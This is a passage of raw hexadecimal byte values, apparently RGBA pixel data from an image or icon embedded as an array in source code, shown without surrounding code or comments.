0xda, 0xfd, 0xff, 0x04, 0xd8, 0xfd, 0xff, 0x04, 0xd9, 0xfd, 0xa4, 0x10, 0xdb, 0xff, 0x3b, 0x04, 0xd7, 0xfd, 0xcc, 0x08, 0xd8, 0xfd, 0xff, 0xe4, 0xfd, 0x96, 0x04, 0xff, 0xff, 0xff, 0x00, 0xc4, 0xc4, 0xc4, 0x03, 0xda, 0xda, 0xda, 0x07, 0xc8, 0xc8, 0xc8, 0x03, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x03, 0xf0, 0xf0, 0xf0, 0x03, 0xfb, 0xfb, 0xfb, 0x03, 0xca, 0xca, 0xca, 0x04, 0xd6, 0xd6, 0xd6, 0x07, 0xd1, 0xd1, 0xd1, 0x04, 0xba, 0xba, 0xba, 0x04, 0xea, 0xea, 0xea, 0x03, 0xda, 0xda, 0xda, 0x08, 0xa2, 0xd9, 0xe6, 0x1f, 0x74, 0xd5, 0xea, 0x38, 0xda, 0xd6, 0xd4, 0x24, 0xf6, 0xd7, 0xcd, 0x1f, 0x10, 0xdc, 0xf8, 0xa3, 0x08, 0xd8, 0xfd, 0xff, 0x04, 0xd8, 0xfd, 0xff, 0x08, 0xd8, 0xfb, 0x8b, 0x0c, 0xd9, 0xfc, 0xff, 0x12, 0xd9, 0xfb, 0xff, 0x1c, 0xd9, 0xf8, 0xff, 0x20, 0xd9, 0xf8, 0xff, 0x25, 0xd9, 0xf7, 0xff, 0x1f, 0xd9, 0xf8, 0xff, 0x0b, 0xda, 0xfd, 0xff, 0x04, 0xd9, 0xfd, 0xff, 0x04, 0xda, 0xfe, 0xff, 0x07, 0xd9, 0xfd, 0xff, 0x08, 0xd9, 0xfd, 0xec, 0x06, 0xd9, 0xfd, 0xac, 0x04, 0xd8, 0xfd, 0xff, 0x02, 0xd8, 0xfe, 0xff, 0x08, 0xde, 0xfd, 0x7b, 0x00, 0xd3, 0xfe, 0x00, 0x5a, 0xd6, 0xf8, 0x00, 0x16, 0xd8, 0xfd, 0x37, 0x4b, 0xea, 0xfb, 0x08, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xe1, 0xe1, 0xe1, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xae, 0xae, 0xae, 0x00, 0xb1, 0xb1, 0xb1, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x03, 0xff, 0xff, 0xff, 0x00, 0xfe, 0xfe, 0xfe, 0x03, 0xff, 0xff, 0xff, 0x03, 0xce, 0xce, 0xce, 0x03, 0xc9, 0xc9, 0xc9, 0x04, 0xe3, 0xe3, 0xe3, 0x03, 0xf1, 0xf1, 0xf1, 0x03, 0xcd, 0xcd, 0xcd, 0x04, 0xdc, 0xd4, 0xd2, 0x04, 0xe6, 0xdf, 0xde, 0x07, 0xd3, 0xd3, 0xd3, 0x0c, 0xe8, 0xd4, 0xd0, 0x1c, 0x41, 0xdc, 0xf4, 0x83, 0x07, 0xd8, 0xfc, 0xf0, 0x20, 0xd8, 0xfc, 0x43, 0x00, 0xd1, 0xfc, 0x00, 0x02, 0xd9, 0xfe, 0xef, 0x06, 0xd8, 0xfd, 0xff, 0x0a, 0xd8, 0xfc, 0xeb, 0x17, 0xd8, 0xf8, 0x73, 0x07, 0xd8, 0xfd, 0xff, 0x0c, 0xd9, 0xfc, 0xff, 0x0d, 0xd9, 0xfc, 0xec, 0x09, 0xd9, 0xfd, 0x78, 0x02, 0xd9, 0xfe, 0xff, 0x03, 0xd9, 0xfe, 0xff, 0x04, 0xd9, 0xfe, 0xc8, 0x00, 0xdc, 0xff, 0x00, 0x05, 0xd8, 0xff, 0x5f, 0x01, 0xd8, 0xfe, 0xff, 0x0a, 0xe1, 0xff, 0x50, 0x00, 0xde, 0xff, 0x00, 0x00, 0xb2, 0xff, 0x00, 0x59, 0xde, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xf7, 0xfd, 0xff, 0x00, 0xae, 0xae, 0xae, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x03, 0xff, 0xff, 0xff, 0x03, 0xee, 0xee, 0xee, 0x03, 0xc0, 0xc0, 0xc0, 0x04, 0xff, 0xff, 0xff, 0x03, 0xf5, 0xf5, 0xf5, 0x03, 0xc6, 0xc6, 0xc6, 0x04, 0xde, 0xde, 0xde, 0x03, 0xe5, 0xe5, 0xe5, 0x03, 0xe2, 0xc8, 0xc1, 0x04, 0x60, 0xd8, 0xee, 0x2b, 0x79, 0xd8, 0xee, 0x28, 0xff, 0xa9, 0x00, 0x00, 0x00, 0xd8, 0xfd, 0x00, 0x00, 0xdc, 0xfe, 0x7b, 0x02, 0xd8, 0xfe, 0xff, 0x15, 0xd9, 0xfa, 0x33, 0x00, 0xd7, 0xff, 0x00, 0x01, 0xd8, 0xfe, 0xa7, 0x02, 0xd8, 0xfe, 0xff, 0x0e, 0xd8, 0xfd, 0x8c, 0x00, 0xcf, 0xff, 0x00, 0x00, 0xd9, 0xfe, 0x5b, 0x00, 0xd8, 0xfe, 0xff, 0x01, 0xdc, 0xff, 0x60, 0x00, 0xc4, 0xfc, 0x00, 0x00, 0xb4, 0xfe, 0x00, 0x00, 0xd7, 0xfe, 0x2c, 0x01, 0xe7, 0xff, 0x1b, 0x14, 0xe5, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0xae, 0xae, 0xae, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xae, 0xae, 0xae, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x03, 0xfe, 0xfe, 0xfe, 0x03, 0xfe, 0xfe, 0xfe, 0x03, 0xff, 0xff, 0xff, 0x03, 0xff, 0xff, 0xff, 0x00, 0xe4, 0xe4, 0xe4, 0x03, 0xf7, 0xf9, 0xfa, 0x03, 0xe4, 0xc2, 0xb6, 0x04, 0xea, 0xe3, 0xe1, 0x08, 0xc1, 0xc1, 0xc1, 0x03, 0xfd, 0xfd, 0xff, 0x00, 0x15, 0xdb, 0xfe, 0x27, 0x0b, 0xda, 0xff, 0x44, 0x00, 0xce, 0xfb, 0x00, 0xd9, 0xef, 0xff, 0x00, 0x00, 0xdb, 0xfe, 0x1f, 0x01, 0xd8, 0xfe, 0xdf, 0x00, 0xc3, 0xfb, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0xcd, 0xfc, 0x00, 0x00, 0xd8, 0xfe, 0x9f, 0x08, 0xff, 0xff, 0x00, 0x66, 0xe9, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0xd0, 0xff, 0x00, 0x00, 0xe8, 0xff, 0x00, 0x00, 0xe7, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xae, 0xae, 0xae, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xea, 0xea, 0xea, 0x03, 0xeb, 0xeb, 0xeb, 0x03, 0xee, 0xee, 0xee, 0x03, 0xff, 0xff, 0xff, 0x00, 0xc9, 0xff, 0xff, 0x00, 0x00, 0xc9, 0xfe, 0x00, 0xf4, 0xfc, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x04, 0xe1, 0xff, 0x00, 0x00, 0xd9, 0xff, 0x13, 0x0c, 0xdb, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x5e, 0xe3, 0xff, 0x00, 0x1d, 0xff, 0xff, 0x00, 0x00, 0xe7, 0xff, 0x00, 0x00, 0xe3, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x03, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x69, 0x69, 0x69, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xae, 0xae, 0xae, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 